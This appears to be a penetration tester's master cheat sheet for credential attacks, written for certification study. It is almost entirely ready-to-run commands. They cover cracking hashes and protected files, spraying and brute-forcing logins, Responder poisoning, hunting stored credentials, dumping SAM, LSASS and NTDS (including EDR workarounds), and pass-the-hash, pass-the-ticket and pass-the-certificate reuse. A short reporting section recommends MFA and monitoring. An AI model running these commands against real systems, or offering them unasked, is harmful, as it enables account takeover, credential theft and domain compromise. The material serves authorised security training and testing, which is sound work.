π‘οΈ Methodology Checklist
- Identify hash type before cracking:
hashid -m [HASH]/hashcat --identify - Order of attack: default creds β credential stuffing β spray β targeted brute β full crack
- Check lockout policy before any spray:
--pass-pol/net accounts - Crack: John (CPU/format-auto) or Hashcat (GPU) β never both on the same hash
- Protected files/archives: convert with
*2johnthen crack - Have NT hash β PtH directly (no crack needed); have ticket β PtT
- Hunt for stored creds (files, history, managers, shares) before privesc
- Document every credential with its source, hash, and method used
π― Operational Context
Use when: Master reference for every password/credential attack in the CPTS lifecycle β hash cracking, network spraying, capture, credential hunting, OS credential dumps, and pass-the-X reuse. Think Dumber First: Try default creds and known breach data before spraying; spray (1 pass / 30 min) before brute; PtH/PtT before cracking. Never jump to full brute force first. Skip when: N/A β master reference document.
β‘ Tactical Cheatsheet
Hash Identification
| Command | Tactical Outcome |
|---|---|
hashid -j [HASH] | Identify hash type + John format flag |
hashid -m [HASH] | Identify hash type + Hashcat mode ID |
hashcat --identify hash.txt | Hashcat-native hash identification |
haiti [HASH] | Modern hash identifier (ranked guesses) |
hashcat --help | grep -i "[PROTOCOL]" | Search Hashcat modes by service name |
Cracking β John & Hashcat
| Command | Tactical Outcome |
|---|---|
john --wordlist=[WORDLIST] [HASH_FILE] | John dictionary crack (auto-detect format) |
john --format=[FORMAT] --wordlist=[WORDLIST] [HASH_FILE] | John crack with explicit format |
john --single [HASH_FILE] | Single-crack mode β mutates username/GECOS metadata |
john --show [HASH_FILE] | Show already-cracked passwords |
john --fork=[CORES] --wordlist=[WORDLIST] [HASH_FILE] | CPU parallelism across cores |
hashcat -a 0 -m [MODE] [HASH_FILE] [WORDLIST] | Hashcat dictionary attack |
hashcat -a 0 -m [MODE] [HASH] rockyou.txt -r /usr/share/hashcat/rules/best64.rule | Dictionary + best64 rules |
hashcat -a 3 -m [MODE] [HASH] '?u?l?l?l?l?d?s' | Mask attack (known pattern) |
hashcat -m [MODE] [HASH] --show | Show cracked results from potfile |
Wordlists & Rules
| Command | Tactical Outcome |
|---|---|
cewl [URL] -d 4 -m 6 --lowercase -w wordlist.txt | Build targeted wordlist by spidering a site |
cupp -i | Interactive profile-based wordlist (OSINT on target) |
username-anarchy -i names.txt | Generate username permutations |
hashcat --stdout wordlist.txt -r [RULE] | Preview mangled candidates a rule produces |
john --rules=[RULE] --wordlist=[WORDLIST] [HASH_FILE] | Apply John mangling rules |
Protected Files & Archives
| Command | Tactical Outcome |
|---|---|
ssh2john [KEY] > ssh.hash && john --wordlist=rockyou.txt ssh.hash | SSH private-key passphrase crack |
pfx2john [FILE].pfx > pfx.hash && john pfx.hash | PEM/PFX certificate passphrase |
zip2john [FILE].zip > zip.hash && john --wordlist=rockyou.txt zip.hash | Password-protected ZIP |
rar2john [FILE].rar > rar.hash && john rar.hash | Password-protected RAR |
7z2john.pl [FILE].7z > 7z.hash && john 7z.hash | Password-protected 7-Zip |
office2john [FILE].docx > off.hash && john off.hash | MS Office document password |
pdf2john [FILE].pdf > pdf.hash && john pdf.hash | PDF document password |
keepass2john [FILE].kdbx > kp.hash && john kp.hash | KeePass database master password |
bitlocker2john -i [FILE].vhd | grep "bitlocker\$0" > bl.hash && hashcat -m 22100 bl.hash rockyou.txt | BitLocker volume crack |
Network β Spraying & Stuffing
| Command | Tactical Outcome |
|---|---|
nxc smb [TARGET_IP] -u [USER] -p [PASS] --pass-pol | Read lockout/password policy FIRST |
nxc smb [SUBNET]/24 -u [USER_LIST] -p '[PASS]' --continue-on-success | Password spray across subnet (collect all valid hits) |
nxc winrm [TARGET_IP] -u [USER_LIST] -p [PASS_LIST] | WinRM spray β Pwn3d! = admin |
kerbrute passwordspray -d [DOMAIN] --dc [DC_IP] [USER_LIST] '[PASS]' | Kerberos pre-auth spray (quieter) |
hydra -C [CRED_LIST] ssh://[TARGET_IP] | Credential stuffing (-C = user:pass file) |
hydra -L [USER_LIST] -P [PASS_LIST] rdp://[TARGET_IP] -t 4 | RDP brute (low threads to avoid crashes) |
hydra -l [USER] -P [PASS_LIST] [TARGET_IP] http-post-form "[PATH]:[BODY]:[FAIL_STR]" | Web login form brute |
Network β Capture & Poisoning
| Command | Tactical Outcome |
|---|---|
sudo tcpdump -i [IFACE] -w capture.pcap | Capture traffic to file |
sudo tcpdump -i [IFACE] -A | grep -i "pass" --color=auto | Live grep traffic for creds |
sudo tcpdump -i [IFACE] port 21 or port 23 or port 80 -w capture.pcap | Capture only cleartext ports |
netsh trace start capture=yes tracefile=C:\trace.etl / netsh trace stop | Windows capture start/stop |
sudo responder -I [IFACE] -A | Analyze mode β passive listen, no poisoning (run first) |
sudo responder -I [IFACE] -w -r -f | Active poisoning β capture Net-NTLMv2 hashes |
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y | Windows-side hash poisoning (PowerShell) |
Credential Hunting β Windows
| Command | Tactical Outcome |
|---|---|
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.ps1 *.yml | Hunt creds in files |
(Get-PSReadLineOption).HistorySavePath β type [PATH] | PowerShell history file |
cmdkey /list | Stored Credential Manager entries |
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | Autologon creds |
C:\Temp\lazagne.exe all | Dump all stored Windows credentials |
Snaffler.exe -s | Auto-hunt sensitive files across shares |
runas /savecred /user:[USER] cmd | Reuse a saved credential |
Credential Hunting β Linux
| Command | Tactical Outcome |
|---|---|
for l in .conf .config .cnf; do find / -name "*$l" 2>/dev/null | grep -v "lib|fonts|share|core"; done | Hunt config files |
grep -rni "password" /home /var/www /etc 2>/dev/null | Recursive cred grep |
cat ~/.bash_history ~/.*_history 2>/dev/null | Shell history for creds |
sudo python3 mimipenguin.py | Dump cleartext creds from memory |
python3 firefox_decrypt.py | Decrypt Firefox saved logins |
sudo python2.7 laZagne.py all | Dump all stored Linux credentials |
Network Shares
| Command | Tactical Outcome |
|---|---|
nxc smb [TARGET_IP] -u [USER] -p [PASS] --shares | List readable/writable shares |
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --content --pattern "passw" | Spider share for keywords |
manspider [TARGET_IP] -d [DOMAIN] -u [USER] -p [PASS] -c "password" | Crawl shares for cred patterns |
OS Credential Dumps β Windows
| Command | Tactical Outcome |
|---|---|
reg.exe save hklm\sam C:\sam.save && reg.exe save hklm\system C:\system.save && reg.exe save hklm\security C:\security.save | Dump registry hives on target |
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL | Offline hash extraction from hives |
nxc smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --sam | Remote SAM dump |
nxc smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --lsa | Remote LSA secrets dump |
rundll32 C:\windows\system32\comsvcs.dll, MiniDump [LSASS_PID] C:\lsass.dmp full | LSASS memory dump (elevated) |
pypykatz lsa minidump lsass.dmp | Parse LSASS dump for all cred types |
nxc smb [DC_IP] -u [USER] -p [PASS] -M ntdsutil | Automated NTDS.dit dump |
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL | Decrypt domain hashes from NTDS |
impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC_IP] -just-dc-ntlm | DCSync-style remote domain dump |
OS Credential Dumps β Linux
| Command | Tactical Outcome |
|---|---|
unshadow passwd.bak shadow.bak > hashes.txt && hashcat -m 1800 hashes.txt rockyou.txt | Unshadow + crack SHA-512 |
cat /etc/shadow (root) | Read local password hashes |
Pass-the-X / Reuse
| Command | Tactical Outcome |
|---|---|
impacket-psexec [USER]@[TARGET_IP] -hashes :[NTLM_HASH] | Pass-the-Hash shell |
evil-winrm -i [TARGET_IP] -u [USER] -H [NTLM_HASH] | PtH WinRM shell |
nxc smb [TARGET_IP] -u [USER] -d . -H [NTLM_HASH] | PtH auth check across hosts |
Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /rc4:[NTLM_HASH] /ptt | OverPass-the-Hash β request + inject TGT |
Rubeus.exe ptt /ticket:[FILE].kirbi | Inject Kerberos ticket into session |
export KRB5CCNAME=[FILE].ccache && klist | Linux: activate stolen ticket |
impacket-ticketConverter ticket.ccache ticket.kirbi | Convert ticket LinuxβWindows |
kinit [USER]@[DOMAIN] -k -t [FILE].keytab | Linux: impersonate via keytab |
python3 gettgtpkinit.py -cert-pfx [FILE].pfx -dc-ip [DC_IP] [DOMAIN]/[USER] /tmp/ticket.ccache | Pass-the-Certificate β TGT |
pywhisker --dc-ip [DC_IP] -d [DOMAIN] -u [USER] -p [PASS] --target [TARGET] --action add | Shadow Credentials injection |
π¬ Deep Dive & Workflow
Decision Tree β What to Attack First
Have a shell?
ββ Local admin β SAM/LSASS/NTDS dump β crack or PtH
ββ Domain user β credential hunting (shares, files, history)
ββ Limited user β credential hunting + privesc first
Have hashes?
ββ NT hash β PtH directly (no crack needed)
ββ Kerberos ticket β PtT
ββ Need plaintext β crack with Hashcat (GPU) / John (CPU)
On the network?
ββ Passive β tcpdump, Wireshark filters
ββ Active poisoning β Responder (LLMNR/NBT-NS)
ββ Share hunting β Snaffler, NetExec spider, MANSPIDER
No creds at all?
ββ Default creds β service-specific lists
ββ Breach data β credential stuffing (hydra -C)
ββ Username list β spray (1 pass / observation window)
Hash Type Quick Reference
| Hash | Mode | Where Found |
|---|---|---|
| NT (NTLM) | 1000 | SAM, LSASS, NTDS |
| NetNTLMv2 | 5600 | Responder captures |
| DCC2 (cached domain) | 2100 | SECURITY hive |
sha512crypt $6$ | 1800 | Linux /etc/shadow |
Yescrypt $y$ | (no stable hashcat mode) | Modern Linux shadow β crack with John |
bcrypt $2*$ | 3200 | App DBs (GPU-hard) |
| BitLocker | 22100 | VHD disk images |
| KeePass | 13400 | .kdbx databases |
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Unsure which cracker | Multiple options | Hashcat for GPU; John for CPU/format-auto β not both on one hash |
| Spray lockout triggered | Wrong observation window | Verify with --pass-pol; window resets after expiry, not per attempt |
| Default creds list incomplete | Generic list | Use seclists/Passwords/Default-Credentials/ per-service lists |
| Hash mode unknown | Need identifier | hashcat --identify / hashid -m / haiti |
| Attack too slow | CPU/GPU bottleneck | GPU required for bcrypt; john --fork; crack SHA1/MD5 first |
| LSASS dump blocked | EDR / PPL | Use comsvcs.dll MiniDump or nanodump; parse offline with pypykatz |
| Cracked pass but no reuse | Account scoped | Try PtH/spray across hosts with NetExec before assuming dead end |
π Reporting Trigger
Finding Title: Password Attack Methodology Applied Across All Identified Services Impact: Systematic password attacks β default credentials, spraying, hash cracking, and credential reuse β provide multiple pathways to valid credentials across all exposed services and user accounts. Root Cause: Absence of MFA, weak password policies, cleartext credential storage, and no anomalous-authentication alerting permit methodical password attacks without detection. Recommendation: Implement MFA across all services. Enforce a strong password policy (12+ chars, no dictionary words). Alert on failed-authentication patterns consistent with spraying. Implement credential-breach monitoring.
π Related Nodes
- Master Cheatsheets Index
- Password_Attacks_Cheat_Sheet
- Password_Cracking_JohnTheRipper
- Password_Cracking_Hashcat
- Password_Cracking_Wordlists_Rules
- Password_Cracking_Protected_Files
- Password_Cracking_Archives
- Password_Attacks_Spraying_Stuffing
- Password_Attacks_Network_Services
- Credential_Hunting_Windows
- Credential_Hunting_Linux
- Credential_Hunting_Network_Shares
- Credential_Hunting_Network_Traffic
- Windows_Credential_Dump_SAM
- Windows_Credential_Dump_LSASS
- Windows_Credential_Dump_NTDS
- Windows_Credential_Manager
- Pass_the_Hash
- Pass_the_Ticket_Windows
- Pass_the_Certificate